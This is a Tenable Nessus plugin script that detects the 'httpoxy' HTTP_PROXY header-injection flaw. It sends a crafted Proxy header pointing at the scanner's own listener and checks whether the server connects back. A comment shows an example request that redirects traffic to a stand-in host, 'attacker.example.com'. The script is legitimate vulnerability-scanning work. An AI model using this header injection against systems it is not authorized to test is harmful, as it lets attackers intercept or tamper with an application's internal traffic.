#TRUSTED 7757ccc72c699faa2ffe9c4f53351ac4d80c4f292d805afa8fa959ac86adc1762d562e16fab11ec1c3ff2ec027c796ae1ae5ed062ea6900564a5cf9a7288adbbb6b9ec40295c81afb7810ecb667c55a0c16df845929d5127921d47071b6336f0a800a7e9e68f1953f750e12ec632198a5c923ad8933d507d85ce908845ef0b1c3e89e3150bf4a974352c465c88a0d34ead7741fef1cadcd8933a69108b202a418b934c032e82288550d8f91d178195c2aae763c68cf88085cab9cb8caf53082c99115ce156621b1605b4a4d31f2eceddf63f426b9c0450b348cd39cabf41c7d7bcfa0cd767f67bb82c0702c663df388eface6b8c2f7e9205c373d5505cdd44a3d30c71e6f4be459ee810cd07f1a8aac02d9c4f64e583c780313df4cadc99f4dad8450d96a05e295ede51b3d312072e29659f489d95fd639beb692f68a792be15028bf83193cb8cd2f23da0d5f6e58ddc512424b35629dbb316013edecd92a8639ce3f53795a555e24b6c005c5e52e38949f143ccf6adc71297aad9402441615920c5f80b3fa1346a93ff5e861f68bffde7edcf6015853a286ceafef4e1a4ba645d983e69df0e6dd787af4139233443f13f683b6dd7fb95cd74b848223e9dddcabaa1950b27ec5efc0db4ee45533db392681bc95a50424c7a55b9c845e2d718539a3459b1f9eead7fb59041798d00f8c83a8f7ea4f9f10e240d3a28e28b2f0f15
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
  script_id(92539);
  script_version("1.12");
  script_cvs_date("Date: 2019/11/19");

  script_cve_id(
    "CVE-2016-5385",
    "CVE-2016-5386",
    "CVE-2016-5387",
    "CVE-2016-5388",
    "CVE-2016-1000109",
    "CVE-2016-1000110"
  );
  script_bugtraq_id(
    91815,
    91816,
    91818,
    91821
  );
  script_xref(name:"CERT", value:"797896");

  script_name(english:"HTTP_PROXY Environment Variable Namespace Collision Vulnerability (httpoxy)");
  script_summary(english:"Checks if the web application responds to a crafted Proxy header in an HTTP request.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web application is affected by a man-in-the-middle
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The web application running on the remote web server is affected by a
man-in-the-middle vulnerability known as 'httpoxy' due to a failure to
properly resolve namespace conflicts in accordance with RFC 3875
section 4.1.18. The HTTP_PROXY environment variable is set based on
untrusted user data in the 'Proxy' header of HTTP requests. The
HTTP_PROXY environment variable is used by some web client libraries
to specify a remote proxy server. An unauthenticated, remote attacker
can exploit this, via a crafted 'Proxy' header in an HTTP request, to
redirect an application's internal HTTP traffic to an arbitrary proxy
server where it may be observed or manipulated.");
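  # Illustration only (not part of the plugin's registration data): a request such as
  #
  #   GET /some/cgi/script HTTP/1.1
  #   Host: www.example.com
  #   Proxy: attacker.example.com:8080
  #
  # is mapped by RFC 3875 style handlers to the meta-variable HTTP_PROXY, i.e.
  # HTTP_PROXY=attacker.example.com:8080, which proxy-aware client libraries may
  # then honor for the application's own outbound HTTP requests. All host names,
  # paths, and ports above are hypothetical.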
script_set_attribute(attribute:"see_also", value:"https://httpoxy.org/");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/oss-sec/2016/q3/94");
script_set_attribute(attribute:"solution", value:
"Applicable libraries and products should be updated to address this
vulnerability. Please consult the library or product vendor for
available updates.
If updating the libraries and products is not an option, or if updates
are unavailable, filter 'Proxy' request headers on all inbound
requests.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-5386");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/07/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/07/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/07/25");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:php:php");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:golang:go");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:http_server");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:tomcat");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:drupal");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:python:python");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:facebook:hiphop_virtual_machine");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Web Servers");
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("webmirror.nasl");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("audit.inc");
include("http.inc");
port = get_http_port(default: 80);
urls = make_list();
# Fix for webmirror_uri "no such table" errors
table = query_scratchpad("SELECT name FROM sqlite_master where type = 'table' and name = 'webmirror_uri'");
if (empty_or_null(table)) exit(1, "Unable to obtain webmirror_uri table from webmirror crawl.");
# Query Scratchpad for webmirror results with a status code of 200
# and load results into urls list
res = query_scratchpad("SELECT DISTINCT uri FROM webmirror_uri WHERE port = ? AND status_code = 200 ORDER BY uri ASC", port);
if (empty_or_null(res)) exit(1, 'Unable to obtain crawled URIs from webmirror scratchpad.');
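# query_scratchpad() returns a list of rows, each an array keyed by column name,
# so each crawled URI is available below as url['uri'].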
# Loop through filters to discard URLs we don't care about testing
i = 0;
foreach url (res)
{
  if (
    # Filter out Apache directory listing page sorting links
    url['uri'] !~ "/\?[CO]\=[NDMSA](%|$)" &&
    # Filter out static text files
    url['uri'] !~ "\.(md|js|css|scss|txt|csv|xml)($|\?)" &&
    # Filter out image files
    url['uri'] !~ "\.(gif|jpeg|jpg|png|svg|ttf|eot|woff|ico)($|\?)" &&
    # Filter out binary files
    url['uri'] !~ "\.(exe|zip|gz|tar)($|\?)" &&
    # Filter out document files
    url['uri'] !~ "\.(rtf|doc|docx|pdf|xls|xlt)($|\?)"
  )
  {
    # Strip any trailing query string from the URL to keep the URL count down
    if ("?" >< url['uri'])
      url['uri'] = ereg_replace(pattern:"(.*)\?.*", replace:"\1", string:url['uri']);

    urls = make_list(urls, url['uri']);
    i++;
  }

  # If thorough_tests is not enabled, stop once more than 10 URLs have been collected
  if (!thorough_tests && i > 10) break;
}
# If we have no URLs to check, bail out
if (empty_or_null(urls))
  audit(AUDIT_WEB_FILES_NOT, "dynamic content", port);
urls = list_uniq(urls);
scanner_ip = compat::this_host();
target_ip = get_host_ip();
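# Data received on the listener should be the HTTP request that a vulnerable
# application proxies through us; its request line ends in HTTP/1.0 or HTTP/1.1,
# which is what this pattern matches.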
pat = "HTTP/1\.(0|1)";
vuln = FALSE;
foreach url (urls)
{
  # If we get an empty URL string, just move on to the next one
  if (empty_or_null(url)) continue;

  # Open a local listener; the target will be told to use it as its proxy
  listener = bind_sock_tcp();
  if (!listener) audit(AUDIT_SOCK_FAIL, 'tcp', 'unknown');
  s_port = listener[1];
  s = listener[0];

  # Exploit is the scanner's IP and our listener's port in the Proxy header
  exploit = scanner_ip + ':' + s_port;

  v = http_mk_get_req(port: port, item: url, add_headers: make_array("Proxy", exploit));
  req = http_mk_buffer_from_req(req: v);
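  # The request built above looks roughly like the following (placeholder values):
  #
  #   GET <url> HTTP/1.1
  #   Host: <target>
  #   Proxy: <scanner_ip>:<listener_port>
  #
  # A vulnerable application exports HTTP_PROXY from the Proxy header and may
  # connect back to our listener when it issues its own HTTP requests.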
  # Send the crafted request; we don't need the response body itself, only
  # whether a response comes back at all.
  req = http_send_recv_buf(port:port, data:req);

  # When we have a successful attack, we won't get a response returned
  # to req, since the proxied request causes the server-side script to
  # pause execution and time out without a response. Since we check for
  # NULL here, we can bypass the listener socket timeout for non-vulnerable
  # URLs and process the URL queue faster.
  if (isnull(req))
  {
    # Instead, we're more interested in whether we got data on the listener socket
    soc = sock_accept(socket:s, timeout:3);
    res = recv(socket:soc, length:1024, timeout:3);
    if (soc) close(soc);
    close(s);
  }
  else
  {
    res = NULL;
    close(s);
  }

  if (!empty_or_null(res) && (res =~ pat))
  {
    vuln = TRUE;
    report = '\nThe full request used to detect this flaw was :\n\n' +
      http_last_sent_request() +
      '\n\nThe server sent back the following data to the listener on port ' + s_port + ':\n\n' +
      res +
      '\n';
  }

  # Stop after the first vulnerable page is found
  if (vuln) break;
}
if (vuln)
{
  security_report_v4(
    port     : port,
    severity : SECURITY_WARNING,
    extra    : report
  );
  exit(0);
}
audit(AUDIT_WEB_SERVER_NOT_AFFECTED, port);